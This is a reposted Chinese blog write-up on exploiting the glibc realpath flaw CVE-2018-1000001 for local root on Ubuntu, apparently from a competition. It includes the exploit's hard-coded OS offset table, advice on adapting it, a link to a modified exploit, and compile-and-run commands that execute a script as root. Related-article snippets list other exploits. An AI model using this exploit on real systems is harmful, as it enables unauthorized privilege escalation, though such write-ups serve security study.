CVE-2018-1000001本地linux提权

最新推荐文章于 2024-05-27 11:45:39 发布
最新推荐文章于 2024-05-27 11:45:39 发布
阅读量973 收藏
点赞数
原文链接:http://www.cnblogs.com/iamstudy/articles/CVE-2018-1000001_some_way.html
版权

最近打比赛遇上的提权漏洞,环境为ubuntu 17.10 (Artful Aardvark)
另外也需要在无交互式的webshell中提权(不通外网)。

漏洞细节: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/

这个洞主要是出在getcwd函数上,在路径判断出现一些问题,作者最后使用具有SUID的mountunmount的程序进行提权操作,所以这个主要对libc方面有一些要求.

可以看到exp里面,硬编码了一些数据在里面,如果系统符合才会进行执行,这就导致有些系统是不会成功的:
https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c

static char* osSpecificExploitDataList[]={
// Debian Stretch
    "\"9 (stretch)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "from_archive",
// Delta for Debian Stretch "2.24-11+deb9u1"
    "\x06\0\0\0\x24\0\0\0\x3e\0\0\0\x7f\xb9\x08\x00\x4f\x86\x09\x00",
// Ubuntu Xenial libc=2.23-0ubuntu9
    "\"16.04.3 LTS (Xenial Xerus)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "_nl_load_locale_from_archive",
    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
// Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"
    "\"18.3 (Sylvia)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "_nl_load_locale_from_archive",
    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
    NULL
};

osReleaseExploitData=osSpecificExploitDataList;
if(osRelease) {
// If an OS was detected, try to find it in list. Otherwise use
// default.
for(int tPos=0; osSpecificExploitDataList[tPos]; tPos+=4) {
 if(!strcmp(osSpecificExploitDataList[tPos], osRelease)) {
   osReleaseExploitData=osSpecificExploitDataList+tPos;
   break;
 }
}
}

可以获取VERSION,然后将上处修改一下。

804631-20180129154109500-1412782552.jpg

赛后使用阿里云的ubuntu 16.04.3做复现,可以提权成功。

804631-20180129154119281-1494387579.jpg

至于无交互的地方,修改此处即可

804631-20180129154128578-1327844386.jpg

修改版为: https://raw.githubusercontent.com/l3m0n/pentest_tools/master/%E6%9D%83%E9%99%90%E6%94%BB%E9%98%B2/linux/%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/CVE-2018-1000001/love1.c

gcc -o exp love1.c -std=c99
./exp

这个将会以root权限执行/bin/bash /tmp/aaaaa.sh

804631-20180129154138718-1259223564.jpg

转载于:https://www.cnblogs.com/iamstudy/articles/CVE-2018-1000001_some_way.html

dengzhasong7076
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
18年远程cve漏洞及利用对应exp
weixin_42373409的博客
09-14 847
CVE-2018-2628 Oracle Weblogic Server Deserialization RCE CVE-2018-2628 https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize CVE-2018-10933 libSSH Auth Bypass Exploit CVE-2018-10933 https://paper.seebug.org/720/https://github.com/.
linux内核2018,CVE-2018-1000001 linux kernel
weixin_42314846的博客
05-04 233
CVE-2018-1000001 linux kernel前置知识一个名称空间将全局系统资源封装在一个抽象中,使其在名称空间内的进程中出现,它们有自己独立的全局资源实例。对全局资源的更改在其他进程中是可见的,但其他进程是不可见的。名称空间的一个用途是实现容器。“mount point”:locations in the file hierarchy where file systems have ...
glibc溢出提权CVE-2018-1000001总结
weixin_34378045的博客
04-22 388
遇到了好几个centos6.5,一直尝试想提权。暂未成功,靶机内核:2.6.32-696.18.7.el6.x86_64。glibc版本:ldd (GNU libc) 2.12目前编译过程中都发现很多坑。最开始编译报错,指定gcc路径/usr/bin/gcc,指定std为c99,使用-std=c99,还需要加-lrt/usr/bin/gcc -o RationalLove RationalLove...
最详细Linux提权总结(建议收藏)
最新发布
HUANGXIN9898的博客
05-27 1113
1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2.命令执行者要对该程序文件拥有执行(x)权限.3.命令执行者在执行该程序时获得该程序文件属主的身份.4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效。
CVE-2018-1000001 glibc realpath缓冲区溢出漏洞分析
子曰小玖的博客
02-12 1833
漏洞原理 首先要理解realpath函数的含义。realpath展开所有符号链接并解析path指定的以null结尾的路径名中的/./和/../以生成规范化的绝对路径名。生成的路径名以null结尾存储在由resolve_path指向的缓冲区中。生成的路径名将没有符号链接,/./或/../。比如/home/root目录下有一个1.txt,那么在/home/root/11/22目录下调用realpat...
2018最新linux漏洞,Libc Realpath缓冲区下溢漏洞(CVE20181000001)分析预警
weixin_39796855的博客
05-16 381
原标题:Libc Realpath缓冲区下溢漏洞(CVE20181000001)分析预警漏洞背景2018年1月11日,OSS-SEC邮件组披露Libc中的Realpath函数存在缓冲区下溢漏洞,CVE编号为CVE-2018-1000001。漏洞的产生是由于GNU C库没有正确处理getcwd()系统调用返回的相对路径,并且没有对缓冲区边界进行检查,其他库也很可能受此影响。经过360CERT评估...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
漏洞利用 CVE-2021-4034-main.zip 提权漏洞
03-03
2021年,一个名为CVE-2021-4034的提权漏洞引起了广泛的关注,这个漏洞被称为"Polkit本地提权漏洞",主要影响Linux操作系统。 **Polkit(原名PolicyKit)** Polkit是Linux系统中用于管理特权操作的一个组件,它为非...
CVE-2021-36934:Windows提权漏洞1
08-03
### CVE-2021-36934:Windows提权漏洞详解 #### 一、漏洞概述 CVE-2021-36934(也被称为HiveNightmare)是存在于Windows操作系统中的一个高危本地权限提升(Local Privilege Escalation, LPE)漏洞。该漏洞首次被...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包7
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包7 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包7 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
Linux本地提权漏洞复现与检测思路
weixin_46137328的博客
10-15 1861
我做的是linux本地提权漏洞的复现。但本地提权漏洞并不像其他web漏洞一样,可以直接pull一个docker镜像就ok了,提权的洞复杂在于配置环境,基本都是在虚拟机里复现,一个镜像的大...
linux数字雨代码解释,linux提权 漏洞合集 linux-kernel-exploits
weixin_39860064的博客
05-12 154
CVE20181000001  [glibc](glibc <= 2.26)CVE-2017-1000367  [Sudo](Sudo 1.8.6p7 – 1.8.20)CVE-2017-1000112  [a memory corruption due to UFO to non-UFO path switch]CVE-2017-16995  [Memory corruption ca...
CVE-2018-1111劫持dhcp造成centos代码执行漏洞
weixin_30794851的博客
06-22 344
0x01 漏洞概述 近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 0x02 影响版本 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux Server 7 CentOS 6 ...
linux内核提权,linux-kernel-exploits
weixin_31412781的博客
04-29 341
CVE2018–18955  [map_write() in kernel/user_namespace.c allows privilege escalation](Linux kernel 4.15.x through 4.19.x before 4.19.2)CVE20181000001  [glibc](glibc <= 2.26)CVE-2017-1000367  [Sudo...
linux缓冲区漏洞,Linux Libc Realpath存在缓冲区下溢漏洞
weixin_35572076的博客
05-17 380
最近OSS-SEC邮件组披露,Linux基准Libc函数库中的Realpath函数存在缓冲区下溢漏洞,CVE编号为CVE-2018-1000001。漏洞的产生是由于GNU C库没有正确处理getcwd()系统调用返回的相对路径,并且没有对缓冲区边界进行检查,其他库也很可能受此影响。该漏洞为高风险漏洞,可直接用于Linux本地提权,目前已经有攻击EXP公开,相关机器应尽快完成相应更新。漏洞分析该漏洞...
Linux下RHEL 5-6和CentOS 5-6漏洞提权
马赛克的博客
01-06 3209
来源:https://www.jianshu.com/p/595b4ac76467 作者:星期四晚八点 ———————————————————————————————————————————————————— 一:前言 提权就是让普通用户用户超级用户的权限。本次试验漏洞适用于RHEL 5-6和CentOS 5-6系列所有版本 主要利用/tmp/目录和/bin/ping命令进行的权限漏洞...
CentOS7 配置防火墙规则应对漏洞扫描
小康子的博客
05-26 2349
CentOS7 配置防火墙以防止 Rancher 漏洞被扫描出来
linux 内核漏洞 2018,Linux发行版高危严重漏洞 CVE-2018-14665
weixin_26716079的博客
05-01 743
安全研究人员在X.OrgServer软件包中发现了一个影响主要Linux发行版的高度严重漏洞(CVE-2018-14665)。安全研究员NarendraShinde在X.OrgServer软件包中发现了一个非常关键的漏洞(CVE-2018-14665),它影响了主要的Linux发行版,包括OpenBSD,Debian,Ubuntu,CentOS,RedHat和Fedora。XorgX项目提供了XW...
IIS6.0 CVE-2017-7269漏洞:远程利用与本地提权详解
"本文主要介绍如何利用IIS6.0中的CVE-2017-7269漏洞进行远程利用和本地提权,以及在过程中可能遇到的常见问题。" 在网络安全领域,IIS (Internet Information Services) 是微软公司提供的一个用于Windows操作系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值